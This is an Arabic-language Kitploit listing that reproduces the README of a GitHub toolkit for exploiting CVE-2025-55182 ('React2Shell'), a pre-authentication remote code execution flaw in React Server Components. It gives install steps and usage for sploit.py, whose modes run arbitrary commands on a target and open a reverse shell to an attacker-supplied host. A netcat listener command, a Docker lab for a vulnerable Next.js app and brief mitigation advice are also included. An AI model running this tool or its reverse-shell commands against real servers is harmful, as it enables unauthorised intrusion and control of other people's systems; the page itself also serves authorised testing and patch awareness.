Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — مجموعة أدوات بسيطة للتحقق من ثغرة RCE الخاصة بـ react2Shell عبر Next.js واستغلالها والحصول على شل تفاعلي. | Kitploit
أدوات/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

مجموعة أدوات بسيطة للتحقق من ثغرة RCE الخاصة بـ react2Shell عبر Next.js واستغلالها والحصول على شل تفاعلي.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182: React2Shell - مجموعة أدوات تنفيذ الأوامر عن بُعد في Next.js

CVE-2025-55182 CVSS License

[!WARNING] هذه الأداة مخصَّصة للاختبار المصرَّح به والأغراض التعليمية فقط. الوصول غير المصرَّح به إلى الشبكات واستخراج البيانات أمران غير قانونيين. يتحمَّل المستخدمون مسؤولية التأكد من حصولهم على التصريح المناسب قبل استخدام هذه الأداة على أي شبكة.

نظرة عامة

يحتوي هذا المستودع على مجموعة أدوات بسيطة للتحقق من CVE-2025-55182 واستغلالها والحصول على قشرة تفاعلية من خلالها، وهي المعروفة أيضًا باسم React2Shell. وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) قبل المصادقة في مكوّنات خادم React (React Server Components - RSC)، وتؤثر على الإصدارات 19.0.0 و19.1.0 و19.1.1 و19.2.0.

تنبع الثغرة من إلغاء تسلسل غير آمن في بروتوكول Flight الخاص بـ React، مما يسمح للمهاجمين غير المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على الخوادم المعرَّضة. تم الكشف عنها في 3 ديسمبر 2025، وحصلت على درجة CVSS 10.0 (حرجة). ورغم أنها تؤثر في المقام الأول على مكوّنات خادم React، إلا أن لها تداعيات على أُطر عمل مثل Next.js التي تستخدم RSC.

ملاحظة: هذه المجموعة مخصَّصة للأغراض التعليمية والبحثية فقط. الاستغلال غير المصرَّح به للثغرات أمر غير قانوني وغير أخلاقي. استخدمها بمسؤولية وعلى الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها فقط.

المكوّنات المتأثرة

  • React Server Components: الإصدارات 19.0.0 و19.1.0 و19.1.1 و19.2.0
  • أُطر العمل ذات الصلة: Next.js (ربما عبر CVE-2025-66478 في بعض السياقات)
  • متجه الاستغلال: إلغاء تسلسل غير آمن في حمولات RSC، مما يتيح تنفيذ الأوامر عن بُعد (RCE) دون مصادقة.

لمزيد من التفاصيل، راجع النشرات الاستشارية الرسمية:

  • NVD CVE-2025-55182
  • React Security Advisory
  • Wiz Blog on React2Shell

الاستخدام


الميزات

  • التحقق: فحص ما إذا كان الهدف معرَّضًا لثغرة CVE-2025-55182.
  • الاستغلال: صياغة حمولات لتنفيذ أوامر عشوائية.
  • قشرة تفاعلية: الحصول على قشرة عكسية (reverse shell) للوصول المستمر.
  • يدعم Python 3.x بحد أدنى من التبعيات.

المتطلبات

  • Python 3.8+
  • المكتبات المطلوبة: requests، argparse (التثبيت عبر pip install -r requirements.txt)

التثبيت

التثبيت عبر Venv

  1. اسحب المستودع
root@kitploit:~
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
cd CVE-2025-55182
  1. البيئة الافتراضية
root@kitploit:~
python3 -m venv CVE202555182Venv
python3 -m pip install -r requirements.txt
  1. التفعيل
root@kitploit:~
source CVE202555182Venv/bin/activate[.fish]

التثبيت المحلي

  1. استنسخ المستودع:
    root@kitploit:~
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. ثبّت التبعيات:
    root@kitploit:~
    pip install -r requirements.txt
    

الاستخدام

البرنامج النصي الرئيسي هو sploit.py. شغّله بالخيارات التالية:

root@kitploit:~
python sploit.py --help

الخيارات

  • --target <URL>: عنوان الهدف (مثل http://vulnerable-site.com).
  • --mode <validate|sploit|shell>: وضع التشغيل.
    • validate: فحص الثغرة دون استغلال.
    • sploit: تنفيذ أمر مخصص.
    • shell: إنشاء قشرة عكسية تفاعلية.
  • --command <CMD>: الأمر المراد تنفيذه (مطلوب لوضع sploit).
  • --lhost <IP>: المضيف المحلي للقشرة العكسية (مطلوب لوضع shell).
  • --lport <PORT>: المنفذ المحلي للقشرة العكسية (الافتراضي: 4444).

أمثلة

  1. التحقق من الثغرة:

    root@kitploit:~
    python sploit.py --target http://example.com --mode validate
    
  2. الاستغلال مع تنفيذ الأوامر:

    root@kitploit:~
    python sploit.py --target http://example.com --mode sploit --command "whoami"
    
  3. الحصول على قشرة تفاعلية: أولًا، جهّز مستمعًا (مثل nc -lvnp 4444)، ثم:

    root@kitploit:~
    python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
    

كيف يعمل

  1. اكتشاف الثغرة: يرسل حمولة RSC مصمَّمة خصيصًا لاكتشاف عيوب إلغاء التسلسل.
  2. صياغة الحمولة: يستخدم إلغاء تسلسل غير آمن لحقن تعليمات برمجية عبر بروتوكول Flight الخاص بـ React.
  3. الوصول إلى القشرة: يرقّي إلى قشرة عكسية عبر تنفيذ حمولة تتصل بجهاز المهاجم.

لمزيد من التعمق التقني:

  • Datadog Security Labs Analysis
  • Dynatrace Blog

مثال تنفيذي


التثبيت عبر Docker

root@kitploit:~

{
  "dependencies": {
    "next": "14.3.0-canary.77",
    "react": "19.0.0",
    "react-dom": "19.0.0"
  },
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "start": "next start"
  }
}

احذف ملف tsconfig.json بالكامل (هذا هو المفتاح الذي كان يعطّل البناء)

root@kitploit:~

rm tsconfig.json

أنشئ الحد الأدنى من ملفات App Router المطلوبة

root@kitploit:~

mkdir -p app

# app/layout.tsx
cat > app/layout.tsx << 'EOF'
import "./globals.css";

export default function RootLayout({
  children,
}: {
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>{children}</body>
    </html>
  );
}

app/globals.css (يمكن أن يكون فارغًا تقريبًا)

root@kitploit:~
echo "/* minimal css - required by Next.js */" > app/globals.css

app/page.tsx (ضع صفحتك المعرَّضة الفعلية هنا – نموذج مبدئي)

root@kitploit:~
cat > app/page.tsx << 'EOF'
export default function Home() {
  return (
    <main>
      <h1>react2shell lab is running!</h1>
      <p>Start sploiting → /api/vulnerable-endpoint</p>
    </main>
  );
}

أنشئ Dockerfile النهائي المحصَّن (بالمحتوى الدقيق)

root@kitploit:~

FROM node:20-alpine

WORKDIR /app

# Copy only package files first (better caching)
COPY package*.json ./

# Install dependencies with legacy peer deps (required for this old canary)
RUN npm install --legacy-peer-deps

# Copy the rest of the app
COPY . .

# Remove tsconfig.json so Next.js doesn't try to auto-install TypeScript (this was the killer)
RUN rm -f tsconfig.json

# Build the Next.js app
RUN npm run build

# Expose port
EXPOSE 3000

# Start the app
CMD ["npm", "start"]

البناء والتشغيل (تعمل هذه الأوامر الآن بشكل مثالي)

root@kitploit:~

docker build -t react2shell .
docker run -d -p 3000:3000 --name react2shell react2shell

افتح في المتصفح

→ http://localhost:3000لقد انتهيت. تبدأ الحاوية في <2 ثانية وهي جاهزة لسلاسل تسميم النموذج الأولي (prototype pollution) → RCE chains.سطر واحد اختياري لتدمير الحاوية وإعادة تشغيلها في أي وقت:bash

root@kitploit:~
docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell

التخفيف

  • حدّث React إلى الإصدار 19.2.1 أو أحدث.
  • عطّل أو قيّد مكوّنات خادم React إذا لم تكن بحاجة إليها.
  • راقب محاولات الاستغلال، إذ لوحظ أن جهات فاعلة مدعومة من دول (مثل مجموعات مرتبطة بالصين) تستهدف هذه الثغرة بسرعة.

راجع AWS Security Blog للحصول على معلومات التهديدات.

إخلاء المسؤولية

هذه الأداة مُقدَّمة «كما هي» دون أي ضمان. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه المجموعة. احصل دائمًا على الإذن قبل اختبار أي ثغرات.

المساهمة

طلبات السحب (Pull requests) مرحَّب بها! بالنسبة للتغييرات الكبيرة، يرجى فتح issue أولًا.

الترخيص

هذا المشروع مرخَّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

المراجع

  • Cisco Advisory
  • Palo Alto Unit 42 Report
  • CMU ISO News
  • Cloudflare Blog
  • Huntress Blog
  • JFrog Blog
  • Elastic Security
شارة صورتك
تنزيل الأداة